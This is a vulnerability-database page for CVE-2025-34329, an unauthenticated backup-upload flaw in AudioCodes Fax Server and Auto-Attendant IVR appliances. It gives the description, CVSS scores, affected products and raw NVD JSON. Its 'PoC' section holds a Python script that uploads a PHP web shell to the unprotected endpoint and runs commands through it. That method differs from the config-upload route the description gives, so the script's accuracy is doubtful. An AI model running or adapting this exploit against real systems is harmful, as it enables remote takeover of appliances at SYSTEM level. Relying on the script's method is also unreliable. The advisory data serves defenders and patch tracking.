Security Vulnerability Report
中文
CVE-2025-34329 CVSS 9.8 CRITICAL

CVE-2025-34329

Published: 2025-11-19 17:15:48
Last Modified: 2025-12-12 16:09:45
Source: [email protected]

Description

AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 expose an unauthenticated backup upload endpoint at AudioCodes_files/ajaxBackupUploadFile.php in the F2MAdmin web interface. The script derives a backup folder path from application configuration, creates the directory if it does not exist, and then moves an uploaded file to that location using the attacker-controlled filename, without any authentication, authorization, or file-type validation. On default Windows deployments where the backup directory resolves to the system drive, a remote attacker can upload web server or interpreter configuration files that cause a log file or other server-controlled resource to be treated as executable code. This allows subsequent HTTP requests to trigger arbitrary command execution under the web server account, which runs as NT AUTHORITY\\SYSTEM.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:audiocodes:fax_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:audiocodes:interactive_voice_response:*:*:*:*:*:*:*:* - VULNERABLE
AudioCodes Fax Server <= 2.6.23
AudioCodes Auto-Attendant IVR <= 2.6.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-34329 AudioCodes Fax Server Unauthenticated RCE PoC Reference: https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-unauthenticated-backup-upload-rce-via-ajaxbackupuploadfile """ import requests import sys TARGET = "http://target:80" # Replace with actual target UPLOAD_ENDPOINT = f"{TARGET}/AudioCodes_files/ajaxBackupUploadFile.php" def check_vulnerability(): """Check if target is vulnerable by uploading a test file""" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', } # Create malicious PHP backdoor file files = { 'file': ('test.php', '<?php phpinfo(); ?>', 'application/x-php') } try: response = requests.post(UPLOAD_ENDPOINT, files=files, headers=headers, timeout=10) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") if response.status_code == 200 and 'success' in response.text.lower(): print("[+] Target appears to be vulnerable!") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def exploit_rce(cmd): """Execute arbitrary command via log poisoning or config file upload""" # Step 1: Upload malicious config to poison log file config_payload = '<?php system($_GET["cmd"]); ?>' files = { 'file': ('shell.php', config_payload, 'application/octet-stream') } response = requests.post(UPLOAD_ENDPOINT, files=files, timeout=10) # Step 2: Trigger command execution shell_url = f"{TARGET}/AudioCodes_files/shell.php" try: exec_response = requests.get(f"{shell_url}?cmd={cmd}", timeout=10) return exec_response.text except: return None if __name__ == "__main__": print("[*] CVE-2025-34329 AudioCodes RCE Exploit") if check_vulnerability(): print("[+] Exploiting...") result = exploit_rce("whoami") if result: print(f"[+] Command output: {result}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34329", "sourceIdentifier": "[email protected]", "published": "2025-11-19T17:15:47.613", "lastModified": "2025-12-12T16:09:44.737", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 expose an unauthenticated backup upload endpoint at AudioCodes_files/ajaxBackupUploadFile.php in the F2MAdmin web interface. The script derives a backup folder path from application configuration, creates the directory if it does not exist, and then moves an uploaded file to that location using the attacker-controlled filename, without any authentication, authorization, or file-type validation. On default Windows deployments where the backup directory resolves to the system drive, a remote attacker can upload web server or interpreter configuration files that cause a log file or other server-controlled resource to be treated as executable code. This allows subsequent HTTP requests to trigger arbitrary command execution under the web server account, which runs as NT AUTHORITY\\\\SYSTEM."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:audiocodes:fax_server:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.6.23", "matchCriteriaId": "A325B684-937A-4AE9-A8B2-235ADB2D1932"}, {"vulnerable": true, "criteria": "cpe:2.3:a:audiocodes:interactive_voice_response:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.6.23", "matchCriteriaId": "131420AA-FE49-42FC-A8EC-50C5EB40D3A3"}]}]}], "references": [{"url": "https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-unauthenticated-backup-upload-rce-via-ajaxbackupuploadfile", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.